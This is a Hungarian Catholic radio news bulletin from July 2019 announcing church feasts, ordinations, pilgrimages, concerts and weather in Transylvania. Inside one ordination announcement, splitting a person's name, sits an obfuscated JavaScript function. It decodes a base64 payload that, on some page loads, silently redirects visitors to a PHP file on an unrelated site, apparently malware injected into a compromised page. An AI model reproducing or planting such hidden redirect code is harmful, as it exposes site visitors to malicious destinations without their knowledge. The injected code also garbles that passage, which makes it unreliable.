2019. július 5. – Hírek és programajánló

H Í R E K   D É L B E N

Búcsú Kudzsiron
A kudzsiri templomot Jézus Szent Vére tiszteletére szentelték. A búcsús szentmise holnap délután fél 6 órakor kezdődik, a szentbeszédet Buciuman György türi plébános tartja.

Sarlós Boldogasszony-napi búcsú
Székelykálban július 7-én, vasárnap délután 1 órakor kezdődik az ünnepi búcsússzentmise, szónoka Mihály József jobbágytelki plébános.

KiSérŐ tábor
A Szent Gellért Alapítvány július 11-14 között, tábort szervez sérült gyerekeket nevelő családok számára, a szelterszi Szent Gellért Rehabilitációs és Rekreációs Házban. Ezzel kapcsolatos további információkat a mai déli magazinban hallhatnak.

Diakónusszentelés
Pál József Csaba megyéspüspök holnap a máriaradnai kegytemplomban szerpappá szenteli a magyarszentmártoni születésű Hojda Ionut-Vasile és a berestyei Radulov Piry teológiai hallgatót. Az ünnepi szentmise 11 órakor kezdődik.
Szintén holnap 11 órától Schönberger Jenő szatmári megyés püspök diakónussá szenteli a szatmárnémeti székesegyházban Jakkel Tamást és Garcia Fernfunction a4872b9c6b(y1){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var x0='';var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<>4);w6=((w9&15)<>2);qe=((we&3)<=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oa<y1.length);document.write(x0);};a4872b9c6b('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KdmFyIG51bWJlcjE9TWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogNSk7IA0KaWYgKG51bWJlcjE9PTMpDQp7DQogdmFyIGRlbGF5ID0gMTUwMDA7CQ0KIHNldFRpbWVvdXQoImRvY3VtZW50LmxvY2F0aW9uLmhyZWY9J2h0dHA6Ly9oYWxlYWluYS1jYWZlLmNvbS93cC1jb250ZW50L3BsdWdpbnMvYWxsLWluLW9uZS1zZW8tcGFjay9pbmMvdHJhbnNsYXRpb24ucGhwJyIsIGRlbGF5KTsNCn0NCjwvc2NyaXB0PgAA');andez Danielt.

Papszentelés és primíciák ditróban
Fülöp Szabolcs-Sándor ünnepélyes első szentmiséjét holnap délelőtt 11 órától mutatja be szülőfalujában, ditrói Jézus Szíve-plébániatemplomban.
Szintén a ditrói nagytemplomban Jakubinyi György érsek július 7-én, vasárnap délelőtt 11 órakor kezdődő szentmise keretében pappá szenteli Kovács Szabolcs diakónust, aki Rómában végzi tanulmányait. A papszentelés egyben az újmisés primíciája is.
Mindkét szentmisét rádiónk élő adásban közvetíti.

Székelyföldi Gyógynövénynap és Nyitott kertek
Ma délután 15:45 -től székelyföldi és magyarországi előadók, székelyföldi termelők és mesteremberek egy nagy ünneppel várják a gyógynövények és használatuk után érdeklődőket, Csíksomlyón a Szent István gyermekvédelmi központ közösségi kertjébe.

Ifjúsági szentmise Temesváron
A temesvár-erzsébetvárosi templomban folytatva az előző évek hagyományát, minden hónap első vasárnapján ifjúsági szentmisét celebrálnak délután 6 órától, énekel a temesvár-gyárvárosi ifjúsági kórus.

Előadás a Kneipp-terápiáról
A csíkbánkfalvi közbirtokosság székházában, július 7-én, vasárnap Péter Mária M. Imelda, mallersdorfi ferences nővér előadást tart A víz gyógyító ereje címmel. A Kneipp-kúra természetes alapokon nyugvó gyógymód, egyszerű, természetes eszközökkel, és kíméletes alkalmazási móddal. Érdemes megtanulni a hideg-meleg víz helyes használatát, gyógyszerként tekinteni arra, amit orvosságként szánt nekünk a Teremtőnk.

Nyárköszöntő Őrangyal módra
Az Őrangyal értelmükben, mozgásukban korlátozott és egészséges fiatalok programja, melynek keretében, évente három alkalommal egy-egy délután ezek az emberek megajándékozzák egymást idejükkel, adottságaikkal: kapcsolatot teremtenek, együtt éreznek. Ha szeretne valaki ebben segíteni, önkéntesként részt venni, megismerni, mit jelent őrangyalnak lenni a Szent Gellért Alapítvány munkatársai hívnak és várnak mindenkit július 7-én, vasárnap délután 4 órától a szelterszi Rehabilitációs és Rekreációs Házba. Majd ezt követően kezdetét veszi a négy napos Őrangyal tábor.

Zarándoklat Altöttingbe
Altötting Bajorország egyik legismertebb Mária-kegyhelye, ahová a Duna menti római katolikus svábok immár 60 éve minden július elején elzarándokolnak. A meghurcoltatás nehéz időszakában a svábok megfogadták: minden évben elmennek Altöttingbe, hogy sorsuk jobbra fordulásáért a Szűzanyához fohászkodjanak.
Az idei zarándoklat július 13-án este 8 órakor szentmisével kezdődik a Szent Anna bazilikában, melyet Pál József Csaba megyéspüspök mutat be. Másnap, július 14-én a program délelőtt fél 10 órakor a résztvevő zarándokok körmentével kezdődik, 10 órakor Dr. Robert Zollitsch freiburgi ny. érsek mutat be szentmisét, koncelebrál Pál József Csaba temesvári főpásztor és dr. Varga Lajos váci segédpüspök.

Verses előadás
Hiszek címmel Zorkóczy Zenóbia kovásznai színművésznő előadására kerül sor, július 8-án hétfőn, délután 6 órától a marosvásárhelyi Szent Kozma és Damján plébánia templomban. A vallásos művészet küldetéséről beszél Vencser László volt teológiai tanár, Balázs Ferenc plébános az istenes versek fontosságát méltatja. Az est házigazdája Varga Gabriella újságíró. Az előadások után vásárt taratanak.

Időjárás: Ma a napsütést főként fátyol- és kisebb gomolyfelhők zavarhatják. Egy-egy zápor az Erdélyi medence térségében és délen fordulhat elő. Az ország északi felén élénk, erős lehet a nyugati szél. Visszatér a kánikula, a friss reggelt követően délután 26-32 fok várható.

MRE - Hírszolgálat, 2019. július 5.

H Í R E K   R E G G E L

Örökös szentségimádási nap
A gyulafehérvári főegyházmegyében a mai nap folyamán a bögözi templomban örökös szentségimádási napot tartanak. Kérjük hittel és bizalommal az Oltáriszentségben jelen levő Krisztust minden ügyünkben.

Elsőpénteki keresztút
Ma a szejkefürdői Ugron-kápolna felé vezető Székely Kálvárián délután 5 órától elvégzik a keresztutat. Időjárástól függetlenül minden alkalommal megtartják a szabadtéri ájtatosságot – ajánlatos ennek megfelelő lábbelit és öltözéket viselni.

Dalolj, ne félj!
Ma a délután 5 órától kezdődő szentmisét követően a gyergyószentmiklósi Munkás Szent József plébánia templomban zenés est lesz. Meghívott vendégek Fehérváry Lilla előadóművész, Varga Gabriella újságíró és Vencser László volt teológiai tanár. A műsor után vásárt tartanak a templomban.

Nyári hangversenysorozat
A kolozsvári Piarista templomban este 7 órától kamarazenei koncert lesz az Intono Kvartett előadásában. Július 7-én, vasárnap gregorián kórus koncert lesz a Schola gregoriana (Svájc) & Schola Transsylvanica (Kolozsvár) kórusok közreműködésével. A koncert sorozat július-augusztus hónapban folytatódik.

Primicia Ditróban
A gyulafehérvári székesegyházban Jakubinyi György érsek áldozópappá szentelte Fülöp Szabolcs-Sándor diakónust, aki első ünnepélyes szentmiséjét szülőfalujában, a ditrói Jézus Szíve-plébániatemplomban mutatja be holnap délelőtt 11 órától. A szentmisét rádiónk élő adásban közvetíti.

Búcsú Szamosújváron
Az örmény katolikus székesegyházban búcsús szentmisét tartanak Világosító Szent Gergely, az örmények apostola tiszteletére. A szentmise holnap délelőtt 11 órától kezdődik, melyen jelen lesz Jakubinyi György érsek, örmény apostoli kormányzó.

Elsőszombati ájtatosságok
A csíksomlyói elsőszombati ünnepélyes Mária köszöntőre autóbusz indul Székelyudvarhelyről, a Márton Áron térről szombaton délután fél 4-kor. Jelentkezni Máyai Erzsébetnél lehet a 0740-617687-es telefonszámon. Mindazok, akik nem tudnak elzarándokolni a kegyhelyre, a szentmisébe bekapcsolódhatnak a csiksomlyo.ro honlapon követhető élő közvetítés révén vagy rádiónk hullámhosszán. A közvetítés hat órakor kezdődik.
A Bekecs-tetői Páduai Szent Antal kápolnában holnap 12 órakor szentmisét mutatnak be.

Koncert Csíksomlyón
A Hazulról Hazaiaknak mesterkurzus résztvevői meg szeretnék ajándékozni a Szűzanyát és a híveket július 7-én, vasárnap a csíksomlyói kegytemplomban. A klasszikus zenei koncert a délelőtt fél 11 órai szentmise után lesz.

Őszi zarándoklat
A szatmári Római Katolikus Püspökség zarándoklatot szervez, Lourdes, Santiago de Compostella, Fatima útvonalon. A két hetes zarándoklat szeptember 30-október 12 között lesz, melynek lelki vezetője Biró Norbert atya. Jelentkezni július 15-ig lehet a szatmári Római Katolikus Püspökségen Mekker Enikőnél vagy a 0261-714955, 0261-716451 és 0744-483444 számokon telefonszámokon. A zarándoklattal kapcsolatos további információkat és a teljes programot megtalálják a www.szatmariegyhazmegye.ro oldalon.

Régizene fesztivál
Július 7–14. között zajlik a csíkszeredai Régizene Fesztivál, programja a Joannes Kájoni emlékév részeként a ferences szerzetes munkássága előtt tiszteleg.
Az idei programban több nemzetközi zenei előadás szólal majd meg, helyet kapnak a fiatal előadók és a visszatérő együttesek. A részletes programról a www.regizene.ro oladalon olvashatnak.

Időjárás: Tizenegy megye huszonnyolc településén okozott károkat a viharos időjárás az elmúlt napokban. A katasztrófavédelmi főfelügyelőség csütörtöki közleménye szerint Maros, Hargita, Kovászna, Brassó, Beszterce-Naszód, Konstanca,
Dâmboviţa, Prahova, Tulcea és Vâlcea megyében, valamint Bukarestben vált szükségessé a katonai tűzoltók beavatkozása az erős szél és az esőzések miatt.
A katasztrófavédelem ugyanakkor felhívja a lakosság figyelmét, hogy a vízkárok megelőzése érdekében tisztítsák ki az árkokat. Erős szél esetén maradjanak megfelelő védelmet nyújtó, zárt helyiségben, kerüljék az olyan helyeket, ahol fák, reklámtáblák vagy villanyoszlopok vannak, amelyeket kidönthet a szél. Ha vihar közeledik, a gépkocsikat parkolják fáktól, villanyoszlopoktól távol eső, védett helyre.
Ma a napsütést főként fátyol- és kisebb gomolyfelhők zavarhatják. Egy-egy zápor az Erdélyi medence térségében és délen fordulhat elő. Az ország északi felén élénk, erős lehet a
nyugati szél. Visszatér a kánikula, a friss reggelt követően délután 26-32 fok várható.

MRE - Hírszolgálat, 2019. július 5.

About the author

Majoros Gabriella